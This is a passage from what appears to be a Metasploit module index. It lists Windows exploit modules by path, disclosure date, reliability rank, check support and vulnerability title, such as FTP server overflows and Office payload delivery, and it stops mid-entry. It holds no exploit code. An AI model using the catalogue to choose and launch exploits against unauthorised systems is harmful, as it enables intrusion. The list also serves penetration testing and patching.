windows/fileformat/djvu_imageurl 2008-10-30 low No DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow - windows/fileformat/dupscout_xml 2017-03-29 normal No Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow - windows/fileformat/dvdx_plf_bof 2007-06-02 normal No DVD X Player 5.5 .plf PlayList Buffer Overflow - windows/fileformat/easycdda_pls_bof 2010-06-07 normal No Easy CD-DA Recorder PLS Buffer Overflow - windows/fileformat/emc_appextender_keyworks 2009-09-29 average No EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow - windows/fileformat/erdas_er_viewer_bof 2013-04-23 normal No ERS Viewer 2011 ERS File Handling Buffer Overflow - windows/fileformat/erdas_er_viewer_rf_report_error 2013-05-23 normal No ERS Viewer 2013 ERS File Handling Buffer Overflow - windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO - windows/fileformat/etrust_pestscan 2009-11-02 average No CA eTrust PestPatrol ActiveX Control Buffer Overflow - windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow - windows/fileformat/fatplayer_wav 2010-10-18 normal No Fat Player Media Player 0.6b0 Buffer Overflow - windows/fileformat/fdm_torrent 2009-02-02 good No Free Download Manager Torrent Parsing Buffer Overflow - windows/fileformat/feeddemon_opml 2009-02-09 great No FeedDemon Stack Buffer Overflow - windows/fileformat/foxit_reader_filewrite 2011-03-05 normal No Foxit PDF Reader 4.2 Javascript File Write - windows/fileformat/foxit_reader_launch 2009-03-09 good No Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow - windows/fileformat/foxit_reader_uaf 2018-04-20 normal No Foxit PDF Reader Pointer Overwrite UAF - windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow - windows/fileformat/free_mp3_ripper_wav 2011-08-27 great No Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow - windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow - windows/fileformat/gsm_sim 2010-07-07 normal No GSM SIM Editor 5.15 Buffer Overflow - windows/fileformat/gta_samp 2011-09-18 normal No GTA SA-MP server.cfg Buffer Overflow - windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/homm3_h3m 2015-07-29 normal No Heroes of Might and Magic III .h3m Map file Buffer Overflow - windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good No HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow - windows/fileformat/ibm_forms_viewer_fontname 2013-12-05 normal No IBM Forms Viewer Unicode Buffer Overflow - windows/fileformat/ibm_pcm_ws 2012-02-28 great No IBM Personal Communications iSeries Access WorkStation 5.9 Profile - windows/fileformat/icofx_bof 2013-12-10 normal No IcoFX Stack Buffer Overflow - windows/fileformat/ideal_migration_ipj 2009-12-05 great No PointDev IDEAL Migration Buffer Overflow - windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow - windows/fileformat/irfanview_jpeg2000_bof 2012-01-16 normal No Irfanview JPEG2000 jp2 Stack Buffer Overflow - windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal No Lattice Semiconductor ispVM System XCF File Handling Overflow - windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal No KingView Log File Parsing Buffer Overflow - windows/fileformat/lattice_pac_bof 2012-05-16 normal No Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow - windows/fileformat/lotusnotes_lzh 2011-05-24 good No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) - windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow - windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low No McAfee Remediation Client ActiveX Control Buffer Overflow - windows/fileformat/mcafee_showreport_exec 2012-01-12 normal No McAfee SaaS MyCioScan ShowReport Remote Command Execution - windows/fileformat/mediacoder_m3u 2013-06-24 normal No MediaCoder .M3U Buffer Overflow - windows/fileformat/mediajukebox 2009-07-01 normal No Media Jukebox 8.0.400 Buffer Overflow (SEH) - windows/fileformat/microp_mppl 2010-08-23 great No MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow - windows/fileformat/millenium_mp3_pls 2009-07-30 great No Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow - windows/fileformat/mini_stream_pls_bof 2010-07-16 great No Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow - windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good No MJM Core Player 2011 .s3m Stack Buffer Overflow - windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good No MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow - windows/fileformat/moxa_mediadbplayback 2010-10-19 average No MOXA MediaDBPlayback ActiveX Control Buffer Overflow - windows/fileformat/mplayer_m3u_bof 2011-03-19 average No MPlayer Lite M3U Buffer Overflow - windows/fileformat/mplayer_sami_bof 2011-05-19 normal No MPlayer SAMI Subtitle File Buffer Overflow - windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability - windows/fileformat/ms10_004_textbytesatom 2010-02-09 good No MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow - windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal No MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow - windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) - windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow - windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal No MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow - windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability - windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average No MS12-027 MSCOMCTL ActiveX Buffer Overflow - windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution - windows/fileformat/ms14_017_rtf 2014-04-01 normal No MS14-017 Microsoft Word RTF Object Confusion - windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution - windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python - windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution - windows/fileformat/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution - windows/fileformat/ms15_100_mcl_exe 2015-09-08 excellent No MS15-100 Microsoft Windows Media Center MCL Vulnerability - windows/fileformat/ms_visual_basic_vbp 2007-09-04 good No Microsoft Visual Basic VBP Buffer Overflow - windows/fileformat/mswin_tiff_overflow 2013-11-05 average No MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow - windows/fileformat/msworks_wkspictureinterface 2008-11-28 low No Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution - windows/fileformat/mymp3player_m3u 2010-03-18 good No Steinberg MyMP3Player 3.0 Buffer Overflow - windows/fileformat/netop 2011-04-28 normal No NetOp Remote Control Client 9.5 Buffer Overflow - windows/fileformat/nitro_reader_jsapi 2017-07-24 excellent No Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution - windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow - windows/fileformat/office_dde_delivery 2017-10-09 manual No Microsoft Office DDE Payload Delivery - windows/fileformat/office_excel_slk 2018-10-07 manual No Microsoft Excel .SLK Payload Delivery - windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 - windows/fileformat/office_ole_multiple_dll_hijack 2015-12-08 normal No Office OLE Multiple DLL Side Loading Vulnerabilities - windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution - windows/fileformat/openoffice_ole 2008-04-17 normal No OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow - windows/fileformat/orbit_download_failed_bof 2008-04-03 normal No Orbit Downloader URL Unicode Conversion Overflow - windows/fileformat/orbital_viewer_orb 2010-02-27 great No Orbital Viewer ORB File Parsing Buffer Overflow - windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability - windows/fileformat/proshow_cellimage_bof 2009-08-20 great No ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow - windows/fileformat/proshow_load_bof 2012-06-06 normal No Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow - windows/fileformat/publishit_pui 2014-02-05 normal No Publish-It PUI Buffer Overflow (SEH) - windows/fileformat/real_networks_netzip_bof 2011-01-30 good No Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability - windows/fileformat/real_player_url_property_bof 2012-12-14 normal No RealPlayer RealMedia File Handling Buffer Overflow - windows/fileformat/realplayer_ver_attribute_bof 2013-12-20 normal No RealNetworks RealPlayer Version Attribute Buffer Overflow - windows/fileformat/safenet_softremote_groupname 2009-10-30 good No SafeNet SoftRemote GROUPNAME Buffer Overflow - windows/fileformat/sascam_get 2008-12-29 low No SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow - windows/fileformat/scadaphone_zip 2011-09-12 good No ScadaTEC ScadaPhone Stack Buffer Overflow - windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal No Shadow Stream Recorder 3.0.1.7 Buffer Overflow - windows/fileformat/shaper_pdf_bof 2015-10-03 normal No PDF Shaper Buffer Overflow - windows/fileformat/somplplayer_m3u 2010-01-22 great No S.O.M.P.L 1.0 Player Buffer Overflow - windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal No Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow - windows/fileformat/syncbreeze_xml 2017-03-29 normal No Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow - windows/fileformat/tfm_mmplayer_m3u_ppl_bof 2012-03-23 good No TFM MMPlayer (m3u/ppl File) Buffer Overflow - windows/fileformat/total_video_player_ini_bof 2013-11-24 normal No Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow - windows/fileformat/tugzip 2008-10-28 good No TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability - windows/fileformat/ultraiso_ccd 2009-04-03 great No UltraISO CCD File Parsing Buffer Overflow - windows/fileformat/ultraiso_cue 2007-05-24 great No UltraISO CUE File Parsing Buffer Overflow - windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow - windows/fileformat/varicad_dwb 2010-03-17 great No VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow - windows/fileformat/videocharge_studio 2013-10-27 normal No VideoCharge Studio Buffer Overflow (SEH) - windows/fileformat/videolan_tivo 2008-10-22 good No VideoLAN VLC TiVo Buffer Overflow - windows/fileformat/videospirit_visprj 2011-04-11 good No VeryTools Video Spirit Pro - windows/fileformat/visio_dxf_bof 2010-05-04 good No Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability - windows/fileformat/visiwave_vwr_type 2011-05-20 great No VisiWave VWR File Parsing Vulnerability - windows/fileformat/vlc_mkv 2018-05-24 great No VLC Media Player MKV Use After Free - windows/fileformat/vlc_modplug_s3m 2011-04-07 average No VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow - windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow - windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow - windows/fileformat/vlc_webm 2011-01-31 good No VideoLAN VLC MKV Memory Corruption - windows/fileformat/vuplayer_cue 2009-08-18 good No VUPlayer CUE Buffer Overflow - windows/fileformat/vuplayer_m3u 2009-08-18 good No VUPlayer M3U Buffer Overflow - windows/fileformat/watermark_master 2013-11-01 normal No Watermark Master Buffer Overflow (SEH) - windows/fileformat/winamp_maki_bof 2009-05-20 normal No Winamp MAKI Buffer Overflow - windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing - windows/fileformat/wireshark_mpeg_overflow 2014-03-20 good No Wireshark wiretap/mpeg.c Stack Buffer Overflow - windows/fileformat/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow (local) - windows/fileformat/wm_downloader_m3u 2010-07-28 normal No WM Downloader 3.1.2.2 Buffer Overflow - windows/fileformat/xenorate_xpl_bof 2009-08-19 great No Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH) - windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow - windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow - windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow - windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good No Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow - windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow - windows/firewall/kerio_auth 2003-04-28 average No Kerio Firewall 2.1.4 Authentication Packet Overflow - windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow - windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow - windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) - windows/ftp/ability_server_stor 2004-10-22 normal Yes Ability Server 2.34 STOR Command Stack Buffer Overflow - windows/ftp/absolute_ftp_list_bof 2011-11-09 normal No AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow - windows/ftp/ayukov_nftp 2017-10-21 normal No Ayukov NFTP FTP Client Buffer Overflow - windows/ftp/bison_ftp_bof 2011-08-07 normal Yes BisonWare BisonFTP Server Buffer Overflow - windows/ftp/cesarftp_mkd 2006-06-12 average Yes Cesar FTP 0.99g MKD Command Buffer Overflow - windows/ftp/comsnd_ftpd_fmtstr 2012-06-08 good Yes ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability - windows/ftp/dreamftp_format 2004-03-03 good Yes BolinTech Dream FTP Server 1.02 Format String - windows/ftp/easyfilesharing_pass 2006-07-31 average Yes Easy File Sharing FTP Server 2.0 PASS Overflow - windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow - windows/ftp/easyftp_list_fixret 2010-07-05 great Yes EasyFTP Server LIST Command Stack Buffer Overflow - windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow - windows/ftp/filecopa_list_overflow 2006-07-19 average No FileCopa FTP Server Pre 18 Jul Version - windows/ftp/filewrangler_list_reply 2010-10-12 good No FileWrangler 5.30 Stack Buffer Overflow - windows/ftp/freefloatftp_user 2012-06-12 normal Yes Free Float FTP Server USER Command Buffer Overflow - windows/ftp/freefloatftp_wbem 2012-12-07 excellent Yes FreeFloat FTP Server Arbitrary File Upload - windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow - windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow - windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) - windows/ftp/ftppad_list_reply 2010-10-12 good No FTPPad 1.2.0 Stack Buffer Overflow - windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow - windows/ftp/ftpshell_cli_bof 2017-03-04 normal No FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow - windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow - windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow - windows/ftp/globalscapeftp_input 2005-05-01 great No GlobalSCAPE Secure FTP Server Input Overflow - windows/ftp/goldenftp_pass_bof 2011-01-23 average Yes GoldenFTP PASS Stack Buffer Overflow - windows/ftp/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability - windows/ftp/kmftp_utility_cwd 2015-08-23 normal Yes Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow - windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow - windows/ftp/leapftp_list_reply 2010-10-12 good No LeapFTP 3.0.1 Stack Buffer Overflow - windows/ftp/leapftp_pasv_reply 2003-06-09 normal No LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow - windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow - windows/ftp/netterm_netftpd_user 2005-04-26 great Yes NetTerm NetFTPD USER Buffer Overflow - windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) - windows/ftp/open_ftpd_wbem 2012-06-18 excellent Yes Open-FTPD 1.2 Arbitrary File Upload - windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Yes Oracle 9i XDB FTP PASS Overflow (win32) - windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Yes Oracle 9i XDB FTP UNLOCK Overflow (win32) - windows/ftp/pcman_put 2015-08-07 normal Yes PCMAN FTP Server Buffer Overflow - PUT Command - windows/ftp/pcman_stor 2013-06-27 normal Yes PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow - windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow - windows/ftp/quickshare_traversal_write 2011-02-03 excellent Yes QuickShare File Server 1.2.1 Directory Traversal Vulnerability - windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow - windows/ftp/sami_ftpd_list 2013-02-27 low No Sami FTP Server LIST Command Buffer Overflow - windows/ftp/sami_ftpd_user 2006-01-24 normal Yes KarjaSoft Sami FTP Server v2.02 USER Overflow - windows/ftp/sasser_ftpd_port 2004-05-10 average No Sasser Worm avserve FTP PORT Buffer Overflow - windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow - windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow - windows/ftp/servu_chmod 2004-12-31 normal Yes Serv-U FTP Server Buffer Overflow - windows/ftp/servu_mdtm 2004-02-26 good Yes Serv-U FTPD MDTM Overflow - windows/ftp/slimftpd_list_concat 2005-07-21 great No SlimFTPd LIST Concatenation Overflow - windows/ftp/trellian_client_pasv 2010-04-11 normal No Trellian FTP Client 3.01 PASV Remote Buffer Overflow - windows/ftp/turboftp_port 2012-10-03 great Yes Turbo FTP Server 1.30.823 PORT Overflow - windows/ftp/vermillion_ftpd_port 2009-09-23 great Yes Vermillion FTP Daemon PORT Command Memory Corruption - windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow - windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow - windows/ftp/wftpd_size 2006-08-23 average No Texas Imperial Software WFTPD 3.23 SIZE Overflow - windows/ftp/winaxe_server_ready 2016-11-03 good No WinaXe 7.7 FTP Client Remote Buffer Overflow - windows/ftp/wing_ftp_admin_exec 2014-06-19 excellent Yes Wing FTP Server Authenticated Command Execution - windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow - windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow - windows/ftp/xftp_client_pwd 2010-04-22 normal No Xftp FTP Client 3.0 PWD Remote Buffer Overflow - windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow - windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow - windows/games/mohaa_getinfo 2004-07-17 great No Medal of Honor Allied Assault getinfo Stack Buffer Overflow - windows/games/racer_503beta5 2008-08-10 great No Racer v0.5.3 Beta 5 Buffer Overflow - windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) - windows/http/adobe_robohelper_authbypass 2009-09-23 excellent No Adobe RoboHelp Server 8 Arbitrary File Upload and Execute - windows/http/altn_securitygateway 2008-06-02 average Yes Alt-N SecurityGateway username Buffer Overflow - windows/http/altn_webadmin 2003-06-24 average No Alt-N WebAdmin USER Buffer Overflow - windows/http/amlibweb_webquerydll_app 2010-08-03 normal Yes Amlibweb NetOpacs webquery.dll Stack Buffer Overflow - windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding - windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow - windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow - windows/http/avaya_ccr_imageupload_exec 2012-06-28 excellent No Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution - windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow - windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow - windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow - windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow - windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow - windows/http/belkin_bulldog 2009-03-08 average No Belkin Bulldog Plus Web Service Buffer Overflow - windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent No CA Arcserve D2D GWT RPC Credential Information Disclosure - windows/http/ca_igateway_debug 2005-10-06 average Yes CA iTechnology iGateway Debug Mode Buffer Overflow - windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent No CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection - windows/http/cogent_datahub_command 2014-04-29 manual Yes Cogent DataHub Command Injection - windows/http/cogent_datahub_request_headers_bof 2013-07-26 normal Yes Cogent DataHub HTTP Server Buffer Overflow - windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute - windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection - windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload - windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload - windows/http/disk_pulse_enterprise_bof 2016-10-03 excellent Yes Disk Pulse Enterprise Login Buffer Overflow - windows/http/disk_pulse_enterprise_get 2017-08-25 excellent Yes Disk Pulse Enterprise GET Buffer Overflow - windows/http/diskboss_get_bof 2016-12-05 excellent Yes DiskBoss Enterprise GET Buffer Overflow - windows/http/disksavvy_get_bof 2016-12-01 excellent Yes DiskSavvy Enterprise GET Buffer Overflow - windows/http/disksorter_bof 2017-03-15 great Yes Disk Sorter Enterprise GET Buffer Overflow - windows/http/dup_scout_enterprise_login_bof 2017-11-14 excellent Yes Dup Scout Enterprise Login Buffer Overflow - windows/http/dupscts_bof 2017-03-15 great Yes Dup Scout Enterprise GET Buffer Overflow - windows/http/easychatserver_seh 2017-10-09 normal No Easy Chat Server User Registeration Buffer Overflow (SEH) - windows/http/easyfilesharing_post 2017-06-12 normal No Easy File Sharing HTTP Server 7.2 POST Buffer Overflow - windows/http/easyfilesharing_seh 2015-12-02 normal No Easy File Sharing HTTP Server 7.2 SEH Overflow - windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow - windows/http/edirectory_host 2006-10-21 great No Novell eDirectory NDS Server Host Header Overflow - windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow - windows/http/efs_easychatserver_username 2007-08-14 great Yes EFS Easy Chat Server Authentication Request Handling Buffer Overflow - windows/http/efs_fmws_userid_bof 2014-05-20 normal Yes Easy File Management Web Server Stack Buffer Overflow - windows/http/ektron_xslt_exec 2012-10-16 excellent Yes Ektron 8.02 XSLT Transform Remote Code Execution - windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution - windows/http/ericom_access_now_bof 2014-06-02 normal Yes Ericom AccessNow Server Buffer Overflow - windows/http/ezserver_http 2012-06-18 excellent No EZHomeTech EzServer Stack Buffer Overflow Vulnerability - windows/http/fdm_auth_header 2009-02-02 great No Free Download Manager Remote Control Server Buffer Overflow - windows/http/generic_http_dll_injection 2015-03-04 manual No Generic Web Application DLL Injection - windows/http/geutebrueck_gcore_x64_rce_bo 2017-01-24 normal Yes Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE - windows/http/gitstack_rce 2018-01-15 great No GitStack Unsanitized Argument RCE - windows/http/hp_autopass_license_traversal 2014-01-10 great Yes HP AutoPass License Server File Upload - windows/http/hp_imc_bims_upload 2013-10-08 excellent Yes HP Intelligent Management Center BIMS UploadServlet Directory Traversal - windows/http/hp_imc_java_deserialize 2017-10-03 excellent Yes HP Intelligent Management Java Deserialization RCE - windows/http/hp_imc_mibfileupload 2013-03-07 great Yes HP Intelligent Management Center Arbitrary File Upload - windows/http/hp_loadrunner_copyfiletoserver 2013-10-30 excellent Yes HP LoadRunner EmulationAdmin Web Service Directory Traversal - windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution - windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow - windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow - windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow - windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig nameParams Buffer Overflow - windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow - windows/http/hp_nnm_openview5 2007-12-06 great No HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow - windows/http/hp_nnm_ovalarm_lang 2009-12-09 great No HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow - windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow - windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal No HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow - windows/http/hp_nnm_ovwebhelp 2009-12-09 great No HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow - windows/http/hp_nnm_snmp 2009-12-09 great No HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow - windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great No HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow - windows/http/hp_nnm_toolbar_01 2009-01-07 great No HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow - windows/http/hp_nnm_toolbar_02 2009-01-21 normal No HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow - windows/http/hp_nnm_webappmon_execvp 2010-07-20 great No HP OpenView Network Node Manager execvp_nc Buffer Overflow - windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great No HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow - windows/http/hp_openview_insight_backdoor 2011-01-31 excellent No HP OpenView Performance Insight Server Backdoor Account Code Execution - windows/http/hp_pcm_snac_update_certificates 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload - windows/http/hp_pcm_snac_update_domain 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload - windows/http/hp_power_manager_filename 2011-10-19 normal No HP Power Manager 'formExportDataLogs' 